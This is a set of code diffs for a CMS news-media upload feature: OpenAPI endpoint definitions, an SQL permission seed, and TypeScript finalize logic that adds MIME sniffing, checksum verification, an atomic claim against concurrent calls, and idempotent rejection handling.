+              schema:
+                allOf:
+                  - $ref: "#/components/schemas/ApiSuccess"
+                  - type: object
+                    required:
+                      - data
+                    properties:
+                      data:
+                        $ref: "#/components/schemas/NewsMediaUploadSessionCreated"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "502":
+          description: News media R2 storage is not configured/enabled for this deployment.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+        "500":
+          $ref: "#/components/responses/InternalError"
+  /api/v1/media/news-images/upload-sessions/{id}/finalize:
+    post:
+      tags:
+        - News Media
+      summary: >-
+        Finalize an upload session — real R2 GET + magic-byte MIME sniffing +
+        server-side SHA-256 checksum (never a bare HEAD)
+      description: >-
+        Verifies the object actually uploaded to R2 by performing a HEAD
+        (existence + real size) followed by a FULL GET, sniffing the MIME
+        type from the object's actual magic bytes, and computing a SHA-256
+        checksum server-side from the bytes read. A client-claimed
+        `checksumSha256` (if supplied) is compared only as a transport-
+        corruption check — it is never a substitute for the MIME sniff. This
+        closes the security-auditor Critical finding on Issue #631: `HEAD`
+        alone can never promote a media object to `verified`.
+      operationId: newsMediaUploadSessionsFinalize
+      security:
+        - bearerAuth: []
+          tenantHeader: []
+      parameters:
+        - name: id
+          in: path
+          required: true
+          schema:
+            type: string
+            format: uuid
+        - $ref: "#/components/parameters/IdempotencyKey"
+        - $ref: "#/components/parameters/CorrelationId"
+        - $ref: "#/components/parameters/RequestId"
+      requestBody:
+        required: false
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/FinalizeNewsMediaUploadSessionRequest"
+      responses:
+        "200":
+          description: Object verified — media object status is now `verified`.
+          content:
+            application/json:
+              schema:
+                allOf:
+                  - $ref: "#/components/schemas/ApiSuccess"
+                  - type: object
+                    required:
+                      - data
+                    properties:
+                      data:
+                        $ref: "#/components/schemas/NewsMediaObjectItem"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "409":
+          description: >-
+            Upload session is not `pending_upload`, has expired
+            (`UPLOAD_SESSION_EXPIRED`), or the Idempotency-Key was reused
+            with a different request (`IDEMPOTENCY_CONFLICT`).
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+        "422":
+          description: >-
+            Uploaded object failed content verification
+            (`UPLOAD_VERIFICATION_FAILED`) — MIME sniff did not match the
+            allow-list/claimed mime type, checksum mismatch, size exceeded,
+            or the object does not exist in R2. `error.details.reason` is
+            one of `object_not_found`, `size_exceeded`,
+            `mime_not_recognized`, `mime_not_allowed`, `mime_mismatch`,
+            `checksum_mismatch`.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+        "502":
+          description: Unable to verify the uploaded object right now (R2 provider error/circuit breaker open) — retry shortly.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+        "500":
+          $ref: "#/components/responses/InternalError"
+  /api/v1/media/news-images/upload-sessions/{id}/cancel:
+    post:
+      tags:
+        - News Media
+      summary: Cancel a still-pending-upload session
+      operationId: newsMediaUploadSessionsCancel
+      security:
+        - bearerAuth: []
+          tenantHeader: []
+      parameters:
+        - name: id
+          in: path
+          required: true
+          schema:
+            type: string
+            format: uuid
+        - $ref: "#/components/parameters/CorrelationId"
+        - $ref: "#/components/parameters/RequestId"
+      responses:
+        "200":
+          description: Upload session cancelled (status `failed`).
+          content:
+            application/json:
+              schema:
+                allOf:
+                  - $ref: "#/components/schemas/ApiSuccess"
+                  - type: object
+                    required:
+                      - data
+                    properties:
+                      data:
+                        $ref: "#/components/schemas/NewsMediaObjectItem"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "409":
+          description: Upload session is not `pending_upload` (already uploaded/verified/attached/failed).
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+        "500":
+          $ref: "#/components/responses/InternalError"
 x-awcms-mini-soft-delete-pattern:
   delete:
     method: DELETE
@@ -12595,6 +12790,160 @@ components:
         nextCursor:
           type: string
           nullable: true
+    CreateNewsMediaUploadSessionRequest:
+      type: object
+      required:
+        - mimeType
+        - byteSize
+      additionalProperties: false
+      properties:
+        mimeType:
+          type: string
+          description: >-
+            Must be one of the deployment's configured
+            NEWS_MEDIA_R2_ALLOWED_MIME_TYPES (default: image/jpeg,
+            image/png, image/webp, image/gif — image/svg+xml is never
+            allowed by default).
+          example: image/jpeg
+        byteSize:
+          type: integer
+          minimum: 1
+          description: Claimed size in bytes — shape-only check against NEWS_MEDIA_R2_MAX_UPLOAD_BYTES; the real size is re-checked from R2 itself at finalize time.
+        originalFilename:
+          type: string
+          nullable: true
+          description: Stored as display-only metadata — never part of the server-generated object key.
+        altText:
+          type: string
+          nullable: true
+        caption:
+          type: string
+          nullable: true
+    NewsMediaUploadSessionCreated:
+      type: object
+      required:
+        - objectId
+        - objectKey
+        - presignedUrl
+        - expiresAt
+      additionalProperties: false
+      properties:
+        objectId:
+          type: string
+          format: uuid
+        objectKey:
+          type: string
+          description: Server-generated — news-media/{tenantId}/{yyyy}/{mm}/{uuid}.{ext}. Never derived from client input.
+          example: news-media/3fa85f64-5717-4562-b3fc-2c963f66afa6/2026/07/1b9d6bcd-bbfd-4b2d-9b5d-ab8dfbbd4bed.jpg
+        presignedUrl:
+          type: string
+          format: uri
+          description: Short-lived presigned PUT URL scoped to exactly one object key. Never includes raw R2 credentials.
+        expiresAt:
+          type: string
+          format: date-time
+    FinalizeNewsMediaUploadSessionRequest:
+      type: object
+      additionalProperties: false
+      properties:
+        checksumSha256:
+          type: string
+          nullable: true
+          description: >-
+            Optional. When supplied, compared against the checksum computed
+            server-side from the bytes actually read from R2 — this is a
+            transport-corruption check only, never a substitute for the
+            server-side MIME sniff.
+          pattern: "^[0-9a-fA-F]{64}$"
+          example: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
+    NewsMediaObjectItem:
+      type: object
+      required:
+        - id
+        - tenantId
+        - objectKey
+        - publicUrl
+        - mimeType
+        - status
+        - createdAt
+        - updatedAt
+      additionalProperties: false
+      properties:
+        id:
+          type: string
+          format: uuid
+        tenantId:
+          type: string
+          format: uuid
+        moduleKey:
+          type: string
+        ownerResourceType:
+          type: string
+          nullable: true
+          enum:
+            [
+              blog_post,
+              blog_page,
+              homepage_section,
+              gallery_item,
+              ad,
+              video_thumbnail,
+              seo_image,
+              null
+            ]
+        ownerResourceId:
+          type: string
+          format: uuid
+          nullable: true
+        storageDriver:
+          type: string
+          enum: [cloudflare_r2]
+        objectKey:
+          type: string
+        originalFilename:
+          type: string
+          nullable: true
+        publicUrl:
+          type: string
+          format: uri
+        mimeType:
+          type: string
+        sizeBytes:
+          type: integer
+          nullable: true
+        checksumSha256:
+          type: string
+          nullable: true
+        width:
+          type: integer
+          nullable: true
+        height:
+          type: integer
+          nullable: true
+        altText:
+          type: string
+          nullable: true
+        caption:
+          type: string
+          nullable: true
+        status:
+          type: string
+          enum:
+            [
+              pending_upload,
+              uploaded,
+              verified,
+              attached,
+              orphaned,
+              deleted,
+              failed
+            ]
+        createdAt:
+          type: string
+          format: date-time
+        updatedAt:
+          type: string
+          format: date-time
 security:
   - bearerAuth: []
     tenantHeader: []

--- a/sql/042_awcms_mini_news_media_permissions.sql
+++ b/sql/042_awcms_mini_news_media_permissions.sql
@@ -1,0 +1,29 @@
+-- Issue #634 (epic `news_portal` #631-#642/#649) — permission catalog seed
+-- for the news media registry, wiring up the constants Issue #633 already
+-- froze in `src/modules/news-portal/domain/news-media-permissions.ts`
+-- (`NEWS_MEDIA_PERMISSIONS`) and this issue's own `module.ts` `permissions`
+-- array declaration. Same shape as `sql/038_awcms_mini_visitor_analytics_permissions.sql`
+-- — extends the global ABAC permission catalog only, no roles/access-
+-- assignments wired here (every EXISTING tenant's `owner` role does not
+-- retroactively gain these — same limitation every prior permission-seed
+-- migration in this repo has; only tenants created AFTER this migration
+-- runs get them automatically via `POST /api/v1/setup/initialize`'s
+-- `INSERT INTO awcms_mini_role_permissions ... SELECT ... FROM
+-- awcms_mini_permissions`).
+--
+-- `cancel` is new relative to #633's original eight-action set — see
+-- `news-media-permissions.ts`'s own comment on why "cancel an own
+-- not-yet-uploaded session" is a distinct, lower-risk permission from
+-- `delete`.
+INSERT INTO awcms_mini_permissions (module_key, activity_code, action, description)
+VALUES
+  ('news_portal', 'media', 'create', 'Create a pending news media object / start a presigned upload session'),
+  ('news_portal', 'media', 'read', 'Read news media object metadata'),
+  ('news_portal', 'media', 'verify', 'Finalize/verify an uploaded news media object'),
+  ('news_portal', 'media', 'attach', 'Attach a verified news media object to an owning resource'),
+  ('news_portal', 'media', 'detach', 'Detach a news media object from its owning resource'),
+  ('news_portal', 'media', 'delete', 'Soft delete news media object metadata'),
+  ('news_portal', 'media', 'restore', 'Restore a soft-deleted news media object'),
+  ('news_portal', 'media', 'purge', 'Hard purge an already soft-deleted news media object'),
+  ('news_portal', 'media', 'cancel', 'Cancel one''s own not-yet-uploaded news media upload session')
+ON CONFLICT (module_key, activity_code, action) DO NOTHING;

--- a/src/modules/news-portal/application/news-media-finalize-upload-session.ts
+++ b/src/modules/news-portal/application/news-media-finalize-upload-session.ts
@@ -13,10 +13,30 @@
  * THIS is the function that closes the security-auditor Critical finding
  * on Issue #631: it never promotes a row past `HEAD` alone.
  * `verifyNewsMediaR2Object` (called below, between two separate
- * `withTenant` transactions) performs a full `GET` + magic-byte MIME
- * sniffing + server-side SHA-256 checksum before any acceptance decision
- * is made (ADR-0006: the R2 calls happen strictly outside any DB
+ * `withTenant` transactions) performs a full, size-capped `GET` + magic-byte
+ * MIME sniffing + server-side SHA-256 checksum before any acceptance
+ * decision is made (ADR-0006: the R2 calls happen strictly outside any DB
  * transaction).
+ *
+ * ## Atomic claim BEFORE the R2 call (security-auditor High finding, PR #653 review)
+ *
+ * `Idempotency-Key` only dedupes an EXACT key match — it does nothing to
+ * stop N concurrent `finalize` calls against the SAME `objectId`, each
+ * using its OWN distinct key (a normal-looking client retry storm, or a
+ * deliberate cost-amplification attack: every such call used to reach
+ * `verifyNewsMediaR2Object` in parallel, each paying for its own `HEAD`+
+ * full `GET` of the same object). The precheck transaction below now calls
+ * `markNewsMediaObjectUploaded(tx, tenantId, objectId)` (no `sizeBytes`/
+ * `checksumSha256` — those are not known yet) as an ATOMIC CLAIM
+ * (`pending_upload -> uploaded`) BEFORE any R2 call happens. Postgres
+ * serializes concurrent `UPDATE`s against the same row, so exactly one
+ * concurrent caller's claim succeeds; every other caller's `UPDATE`
+ * matches zero rows (the row is no longer `pending_upload`) and gets `null`
+ * back immediately — a cheap `409`, no R2 call ever attempted. If the R2
+ * call itself then fails for a transient/infra reason (not a content
+ * rejection), the claim is reverted (`revertNewsMediaObjectUploadClaim`)
+ * so the session stays retryable rather than being stuck in `uploaded`
+ * forever.
  */
 import { fail, jsonResponse, ok } from "../../_shared/api-response";
 import { withTenant } from "../../../lib/database/tenant-context";
@@ -33,7 +53,8 @@ import {
   fetchNewsMediaObjectById,
   markNewsMediaObjectFailed,
   markNewsMediaObjectUploaded,
-  markNewsMediaObjectVerified
+  markNewsMediaObjectVerified,
+  revertNewsMediaObjectUploadClaim
 } from "./news-media-object-directory";
 import {
   createNewsMediaR2Client,
@@ -187,6 +208,22 @@ export async function finalizeNewsMediaUploadSession(
         };
       }
 
+      // Atomic claim — see this module's header. Must happen BEFORE any R2
+      // call, and BEFORE this transaction commits, so Postgres's own
+      // row-update serialization is what does the mutual exclusion.
+      const claimed = await markNewsMediaObjectUploaded(tx, tenantId, objectId);
+
+      if (!claimed) {
+        return {
+          kind: "response",
+          response: fail(
+            409,
+            "INVALID_STATUS_TRANSITION",
+            "Upload session is already being finalized (or was already finalized) by another request."
+          )
+        };
+      }
+
       return {
         kind: "proceed",
         objectId: row.id,
@@ -202,6 +239,9 @@ export async function finalizeNewsMediaUploadSession(
   }
 
   // Strictly outside any DB transaction (ADR-0006) — real R2 network calls.
+  // At this point THIS call, and only this call, holds the `uploaded` claim
+  // for this object — no other concurrent `finalize` call can reach here
+  // for the same objectId until this one reverts or resolves it.
   const r2Client = createR2Client(config);
 
   const verification = await verifyNewsMediaR2Object(r2Client, {
@@ -219,6 +259,12 @@ export async function finalizeNewsMediaUploadSession(
       objectId: precheck.objectId,
       error: verification.error
     });
+
+    // Transient/infra failure, not a content rejection — revert the claim
+    // so the session stays retryable instead of being stuck in `uploaded`.
+    await withTenant(sql, tenantId, (tx) =>
+      revertNewsMediaObjectUploadClaim(tx, tenantId, precheck.objectId)
+    );
 
     return fail(
       502,
@@ -246,31 +292,32 @@ export async function finalizeNewsMediaUploadSession(
         correlationId
       });
 
-      return fail(
+      const rejectedResponse = fail(
         422,
         "UPLOAD_VERIFICATION_FAILED",
         "Uploaded object failed content verification.",
         {},
         { reason: verification.reason }
       );
-    }
+      const rejectedBody = await rejectedResponse.clone().json();
 
-    const uploaded = await markNewsMediaObjectUploaded(
-      tx,
-      tenantId,
-      precheck.objectId,
-      {
-        sizeBytes: verification.sizeBytes,
-        checksumSha256: verification.checksumSha256
-      }
-    );
-
-    if (!uploaded) {
-      return fail(
-        409,
-        "INVALID_STATUS_TRANSITION",
-        "Upload session state changed concurrently; retry."
+      // Store the rejection under this Idempotency-Key too (not just the
+      // success path) — the row is now `failed`, so a same-key/same-payload
+      // retry without this would hit the status guard above instead and
+      // get a DIFFERENT ("Cannot finalize... status failed") response,
+      // breaking the "same key + same request -> replay" idempotency
+      // contract (reviewer feedback, PR #653).
+      await saveIdempotencyRecord(
+        tx,
+        tenantId,
+        IDEMPOTENCY_SCOPE,
+        idempotencyKey,
+        requestHash,
+        422,
+        rejectedBody
       );
+
+      return rejectedResponse;
     }
 
     const verified = await markNewsMediaObjectVerified(
@@ -278,7 +325,10 @@ export async function finalizeNewsMediaUploadSession(
       tenantId,
       precheck.actorTenantUserId,
       precheck.objectId,
-      {},
+      {
+        sizeBytes: verification.sizeBytes,
+        checksumSha256: verification.checksumSha256
+      },
       correlationId
     );
 

--- a/src/modules/news-portal/application/news-media-finalize-upload-session.ts
+++ b/src/modules/news-portal/application/news-media-finalize-upload-session.ts
@@ -1,0 +1,308 @@
+/**
+ * Finalize orchestration for the direct-to-R2 presigned upload flow (Issue
+ * #634). Extracted out of the route handler
+ * (`pages/api/v1/media/news-images/upload-sessions/[id]/finalize.ts`) so
+ * the route stays thin (`awcms-mini-new-endpoint` skill: "route hanya
+ * orkestrasi") and so integration tests can exercise this exact logic
+ * against a real database with an INJECTED R2 client (a real
+ * `Bun.S3Client` pointed at a local fake HTTP server, same convention
+ * `tests/integration/object-dispatch.integration.test.ts` already
+ * established for `sync-storage`) — the route itself does not expose a
+ * seam for that, but a plain async function does, via `deps.createR2Client`.
+ *
+ * THIS is the function that closes the security-auditor Critical finding
+ * on Issue #631: it never promotes a row past `HEAD` alone.
+ * `verifyNewsMediaR2Object` (called below, between two separate
+ * `withTenant` transactions) performs a full `GET` + magic-byte MIME
+ * sniffing + server-side SHA-256 checksum before any acceptance decision
+ * is made (ADR-0006: the R2 calls happen strictly outside any DB
+ * transaction).
+ */
+import { fail, jsonResponse, ok } from "../../_shared/api-response";
+import { withTenant } from "../../../lib/database/tenant-context";
+import { authorizeInTransaction } from "../../identity-access/application/access-guard";
+import { log } from "../../../lib/logging/logger";
+import { recordAuditEvent } from "../../logging/application/audit-log";
+import {
+  computeRequestHash,
+  findIdempotencyRecord,
+  saveIdempotencyRecord
+} from "../../_shared/idempotency";
+import type { NewsMediaR2Config } from "../domain/news-media-r2-config";
+import {
+  fetchNewsMediaObjectById,
+  markNewsMediaObjectFailed,
+  markNewsMediaObjectUploaded,
+  markNewsMediaObjectVerified
+} from "./news-media-object-directory";
+import {
+  createNewsMediaR2Client,
+  type NewsMediaR2Client
+} from "../infrastructure/news-media-r2-client";
+import { verifyNewsMediaR2Object } from "./news-media-r2-verification";
+
+const VERIFY_GUARD = {
+  moduleKey: "news_portal",
+  activityCode: "media",
+  action: "verify" as const
+};
+
+const IDEMPOTENCY_SCOPE = "news_media_upload_session_finalize";
+
+type PrecheckResult =
+  | { kind: "response"; response: Response }
+  | {
+      kind: "proceed";
+      objectId: string;
+      objectKey: string;
+      claimedMimeType: string;
+      actorTenantUserId: string;
+    };
+
+export type FinalizeNewsMediaUploadSessionInput = {
+  tenantId: string;
+  objectId: string;
+  tokenHash: string;
+  idempotencyKey: string;
+  claimedChecksumSha256: string | null;
+  now: Date;
+  correlationId?: string;
+};
+
+export type FinalizeNewsMediaUploadSessionDeps = {
+  sql: Bun.SQL;
+  config: NewsMediaR2Config;
+  /** Test-only injection point — defaults to a real `Bun.S3Client`-backed client built from `deps.config`. */
+  createR2Client?: (config: NewsMediaR2Config) => NewsMediaR2Client;
+};
+
+function defaultR2ClientFactory(config: NewsMediaR2Config): NewsMediaR2Client {
+  return createNewsMediaR2Client({
+    accountId: config.accountId,
+    accessKeyId: config.accessKeyId,
+    secretAccessKey: config.secretAccessKey,
+    bucket: config.bucket
+  });
+}
+
+export async function finalizeNewsMediaUploadSession(
+  input: FinalizeNewsMediaUploadSessionInput,
+  deps: FinalizeNewsMediaUploadSessionDeps
+): Promise<Response> {
+  const { tenantId, objectId, tokenHash, idempotencyKey, now, correlationId } =
+    input;
+  const claimedChecksumSha256 = input.claimedChecksumSha256;
+  const requestHash = computeRequestHash({ objectId, claimedChecksumSha256 });
+  const { sql, config } = deps;
+  const createR2Client = deps.createR2Client ?? defaultR2ClientFactory;
+
+  const precheck = await withTenant<PrecheckResult>(
+    sql,
+    tenantId,
+    async (tx) => {
+      const auth = await authorizeInTransaction(
+        tx,
+        tenantId,
+        tokenHash,
+        now,
+        VERIFY_GUARD
+      );
+
+      if (!auth.allowed) {
+        return { kind: "response", response: auth.denied };
+      }
+
+      const existingIdempotency = await findIdempotencyRecord(
+        tx,
+        tenantId,
+        IDEMPOTENCY_SCOPE,
+        idempotencyKey
+      );
+
+      if (existingIdempotency) {
+        if (existingIdempotency.requestHash !== requestHash) {
+          return {
+            kind: "response",
+            response: fail(
+              409,
+              "IDEMPOTENCY_CONFLICT",
+              "Idempotency-Key was already used with a different request."
+            )
+          };
+        }
+
+        return {
+          kind: "response",
+          response: jsonResponse(existingIdempotency.responseBody, {
+            status: existingIdempotency.responseStatus
+          })
+        };
+      }
+
+      const row = await fetchNewsMediaObjectById(tx, tenantId, objectId);
+
+      if (!row) {
+        return {
+          kind: "response",
+          response: fail(404, "RESOURCE_NOT_FOUND", "Upload session not found.")
+        };
+      }
+
+      if (row.status !== "pending_upload") {
+        return {
+          kind: "response",
+          response: fail(
+            409,
+            "INVALID_STATUS_TRANSITION",
+            `Cannot finalize an upload session in status "${row.status}".`
+          )
+        };
+      }
+
+      const expiresAtMs =
+        row.createdAt.getTime() + config.presignedUploadTtlSeconds * 1000;
+
+      if (now.getTime() > expiresAtMs) {
+        await markNewsMediaObjectFailed(tx, tenantId, objectId);
+        await recordAuditEvent(tx, {
+          tenantId,
+          actorTenantUserId: auth.context.tenantUserId,
+          moduleKey: "news_portal",
+          action: "news_media.object.finalize_rejected",
+          resourceType: "news_media_object",
+          resourceId: objectId,
+          severity: "warning",
+          message: `News media finalize rejected: upload session expired (${row.objectKey}).`,
+          attributes: { objectKey: row.objectKey, reason: "session_expired" },
+          correlationId
+        });
+
+        return {
+          kind: "response",
+          response: fail(
+            409,
+            "UPLOAD_SESSION_EXPIRED",
+            "Upload session has expired; start a new upload session."
+          )
+        };
+      }
+
+      return {
+        kind: "proceed",
+        objectId: row.id,
+        objectKey: row.objectKey,
+        claimedMimeType: row.mimeType,
+        actorTenantUserId: auth.context.tenantUserId
+      };
+    }
+  );
+
+  if (precheck.kind === "response") {
+    return precheck.response;
+  }
+
+  // Strictly outside any DB transaction (ADR-0006) — real R2 network calls.
+  const r2Client = createR2Client(config);
+
+  const verification = await verifyNewsMediaR2Object(r2Client, {
+    objectKey: precheck.objectKey,
+    claimedMimeType: precheck.claimedMimeType,
+    allowedMimeTypes: config.allowedMimeTypes,
+    maxUploadBytes: config.maxUploadBytes,
+    claimedChecksumSha256
+  });
+
+  if (verification.outcome === "provider_error") {
+    log("error", "news-portal.upload-session.finalize.provider_error", {
+      correlationId,
+      tenantId,
+      objectId: precheck.objectId,
+      error: verification.error
+    });
+
+    return fail(
+      502,
+      "PROVIDER_ERROR",
+      "Unable to verify the uploaded object right now. Try again shortly."
+    );
+  }
+
+  return withTenant(sql, tenantId, async (tx) => {
+    if (verification.outcome === "rejected") {
+      await markNewsMediaObjectFailed(tx, tenantId, precheck.objectId);
+      await recordAuditEvent(tx, {
+        tenantId,
+        actorTenantUserId: precheck.actorTenantUserId,
+        moduleKey: "news_portal",
+        action: "news_media.object.finalize_rejected",
+        resourceType: "news_media_object",
+        resourceId: precheck.objectId,
+        severity: "warning",
+        message: `News media finalize rejected: ${verification.reason} (${precheck.objectKey}).`,
+        attributes: {
+          objectKey: precheck.objectKey,
+          reason: verification.reason
+        },
+        correlationId
+      });
+
+      return fail(
+        422,
+        "UPLOAD_VERIFICATION_FAILED",
+        "Uploaded object failed content verification.",
+        {},
+        { reason: verification.reason }
+      );
+    }
+
+    const uploaded = await markNewsMediaObjectUploaded(
+      tx,
+      tenantId,
+      precheck.objectId,
+      {
+        sizeBytes: verification.sizeBytes,
+        checksumSha256: verification.checksumSha256
+      }
+    );
+
+    if (!uploaded) {
+      return fail(
+        409,
+        "INVALID_STATUS_TRANSITION",
+        "Upload session state changed concurrently; retry."
+      );
+    }
+
+    const verified = await markNewsMediaObjectVerified(
+      tx,
+      tenantId,
+      precheck.actorTenantUserId,
+      precheck.objectId,
+      {},
+      correlationId
+    );
+
+    if (!verified) {
+      return fail(
+        409,
+        "INVALID_STATUS_TRANSITION",
+        "Upload session state changed concurrently; retry."
+      );
+    }
+
+    const successResponse = ok(verified);
+    const successBody = await successResponse.clone().json();
+
+    await saveIdempotencyRecord(
+      tx,
+      tenantId,
+      IDEMPOTENCY_SCOPE,
+      idempotencyKey,
+      requestHash,
+      200,
+      successBody
+    );
+
+    return successResponse;
+  });
+}

--- a/src/modules/news-portal/application/news-media-finalize-upload-session.ts
+++ b/src/modules/news-portal/application/news-media-finalize-upload-session.ts
@@ -244,13 +244,52 @@ export async function finalizeNewsMediaUploadSession(
   // for the same objectId until this one reverts or resolves it.
   const r2Client = createR2Client(config);
 
-  const verification = await verifyNewsMediaR2Object(r2Client, {
-    objectKey: precheck.objectKey,
-    claimedMimeType: precheck.claimedMimeType,
-    allowedMimeTypes: config.allowedMimeTypes,
-    maxUploadBytes: config.maxUploadBytes,
-    claimedChecksumSha256
-  });
+  // Reverts the claim (`uploaded -> pending_upload`) — called both for the
+  // handled `provider_error` outcome AND for any UNEXPECTED exception
+  // between the claim commit and this call's own resolution (reviewer +
+  // security-auditor feedback, PR #653 re-review): a bug, an OOM, or an
+  // unforeseen throw from `verifyNewsMediaR2Object`/the resolving
+  // transaction below would otherwise leave the row permanently stuck at
+  // `uploaded` (no client-triggerable recovery — both `finalize` and
+  // `cancel` require `pending_upload`). Best-effort: if the revert itself
+  // fails, that failure is only logged — it never masks/replaces the
+  // caller's own error path.
+  const revertClaim = async () => {
+    await withTenant(sql, tenantId, (tx) =>
+      revertNewsMediaObjectUploadClaim(tx, tenantId, precheck.objectId)
+    ).catch((revertError) => {
+      log("error", "news-portal.upload-session.finalize.revert_claim_failed", {
+        correlationId,
+        tenantId,
+        objectId: precheck.objectId,
+        error:
+          revertError instanceof Error
+            ? revertError.message
+            : String(revertError)
+      });
+    });
+  };
+
+  let verification: Awaited<ReturnType<typeof verifyNewsMediaR2Object>>;
+
+  try {
+    verification = await verifyNewsMediaR2Object(r2Client, {
+      objectKey: precheck.objectKey,
+      claimedMimeType: precheck.claimedMimeType,
+      allowedMimeTypes: config.allowedMimeTypes,
+      maxUploadBytes: config.maxUploadBytes,
+      claimedChecksumSha256
+    });
+  } catch (error) {
+    log("error", "news-portal.upload-session.finalize.unexpected_error", {
+      correlationId,
+      tenantId,
+      objectId: precheck.objectId,
+      error: error instanceof Error ? error.message : String(error)
+    });
+    await revertClaim();
+    throw error;
+  }
 
   if (verification.outcome === "provider_error") {
     log("error", "news-portal.upload-session.finalize.provider_error", {
@@ -262,9 +301,7 @@ export async function finalizeNewsMediaUploadSession(
 
     // Transient/infra failure, not a content rejection — revert the claim
     // so the session stays retryable instead of being stuck in `uploaded`.
-    await withTenant(sql, tenantId, (tx) =>
-      revertNewsMediaObjectUploadClaim(tx, tenantId, precheck.objectId)
-    );
+    await revertClaim();
 
     return fail(
       502,
@@ -273,86 +310,97 @@ export async function finalizeNewsMediaUploadSession(
     );
   }
 
-  return withTenant(sql, tenantId, async (tx) => {
-    if (verification.outcome === "rejected") {
-      await markNewsMediaObjectFailed(tx, tenantId, precheck.objectId);
-      await recordAuditEvent(tx, {
+  try {
+    return await withTenant(sql, tenantId, async (tx) => {
+      if (verification.outcome === "rejected") {
+        await markNewsMediaObjectFailed(tx, tenantId, precheck.objectId);
+        await recordAuditEvent(tx, {
+          tenantId,
+          actorTenantUserId: precheck.actorTenantUserId,
+          moduleKey: "news_portal",
+          action: "news_media.object.finalize_rejected",
+          resourceType: "news_media_object",
+          resourceId: precheck.objectId,
+          severity: "warning",
+          message: `News media finalize rejected: ${verification.reason} (${precheck.objectKey}).`,
+          attributes: {
+            objectKey: precheck.objectKey,
+            reason: verification.reason
+          },
+          correlationId
+        });
+
+        const rejectedResponse = fail(
+          422,
+          "UPLOAD_VERIFICATION_FAILED",
+          "Uploaded object failed content verification.",
+          {},
+          { reason: verification.reason }
+        );
+        const rejectedBody = await rejectedResponse.clone().json();
+
+        // Store the rejection under this Idempotency-Key too (not just the
+        // success path) — the row is now `failed`, so a same-key/same-payload
+        // retry without this would hit the status guard above instead and
+        // get a DIFFERENT ("Cannot finalize... status failed") response,
+        // breaking the "same key + same request -> replay" idempotency
+        // contract (reviewer feedback, PR #653).
+        await saveIdempotencyRecord(
+          tx,
+          tenantId,
+          IDEMPOTENCY_SCOPE,
+          idempotencyKey,
+          requestHash,
+          422,
+          rejectedBody
+        );
+
+        return rejectedResponse;
+      }
+
+      const verified = await markNewsMediaObjectVerified(
+        tx,
         tenantId,
-        actorTenantUserId: precheck.actorTenantUserId,
-        moduleKey: "news_portal",
-        action: "news_media.object.finalize_rejected",
-        resourceType: "news_media_object",
-        resourceId: precheck.objectId,
-        severity: "warning",
-        message: `News media finalize rejected: ${verification.reason} (${precheck.objectKey}).`,
-        attributes: {
-          objectKey: precheck.objectKey,
-          reason: verification.reason
+        precheck.actorTenantUserId,
+        precheck.objectId,
+        {
+          sizeBytes: verification.sizeBytes,
+          checksumSha256: verification.checksumSha256
         },
         correlationId
-      });
-
-      const rejectedResponse = fail(
-        422,
-        "UPLOAD_VERIFICATION_FAILED",
-        "Uploaded object failed content verification.",
-        {},
-        { reason: verification.reason }
       );
-      const rejectedBody = await rejectedResponse.clone().json();
 
-      // Store the rejection under this Idempotency-Key too (not just the
-      // success path) — the row is now `failed`, so a same-key/same-payload
-      // retry without this would hit the status guard above instead and
-      // get a DIFFERENT ("Cannot finalize... status failed") response,
-      // breaking the "same key + same request -> replay" idempotency
-      // contract (reviewer feedback, PR #653).
+      if (!verified) {
+        return fail(
+          409,
+          "INVALID_STATUS_TRANSITION",
+          "Upload session state changed concurrently; retry."
+        );
+      }
+
+      const successResponse = ok(verified);
+      const successBody = await successResponse.clone().json();
+
       await saveIdempotencyRecord(
         tx,
         tenantId,
         IDEMPOTENCY_SCOPE,
         idempotencyKey,
         requestHash,
-        422,
-        rejectedBody
+        200,
+        successBody
       );
 
-      return rejectedResponse;
-    }
-
-    const verified = await markNewsMediaObjectVerified(
-      tx,
+      return successResponse;
+    });
+  } catch (error) {
+    log("error", "news-portal.upload-session.finalize.unexpected_error", {
+      correlationId,
       tenantId,
-      precheck.actorTenantUserId,
-      precheck.objectId,
-      {
-        sizeBytes: verification.sizeBytes,
-        checksumSha256: verification.checksumSha256
-      },
-      correlationId
-    );
-
-    if (!verified) {
-      return fail(
-        409,
-        "INVALID_STATUS_TRANSITION",
-        "Upload session state changed concurrently; retry."
-      );
-    }
-
-    const successResponse = ok(verified);
-    const successBody = await successResponse.clone().json();
-
-    await saveIdempotencyRecord(
-      tx,
-      tenantId,
-      IDEMPOTENCY_SCOPE,
-      idempotencyKey,
-      requestHash,
-      200,
-      successBody
-    );
-
-    return successResponse;
-  });
+      objectId: precheck.objectId,
+      error: error instanceof Error ? error.message : String(error)
+    });
+    await revertClaim();
+    throw error;
+  }
 }

--- a/src/modules/news-portal/application/news-media-object-directory.ts
+++ b/src/modules/news-portal/application/news-media-object-directory.ts
@@ -251,29 +251,44 @@ export async function fetchNewsMediaObjectById(
 }
 
 export type MarkNewsMediaObjectUploadedInput = {
-  sizeBytes: number;
-  checksumSha256: string;
+  sizeBytes?: number;
+  checksumSha256?: string;
 };
 
 /**
- * `pending_upload -> uploaded` — the R2 PUT itself succeeded (proven by the
- * caller's own HEAD/GET against R2, done OUTSIDE this transaction per
- * ADR-0006 — this function only records the outcome). Deliberately NOT an
- * audited action on its own: "uploaded" only means bytes exist at the
- * object key, not that they were verified as safe/matching content
- * (`markNewsMediaObjectVerified` is the audited "verify" action the epic's
- * acceptance criteria actually requires).
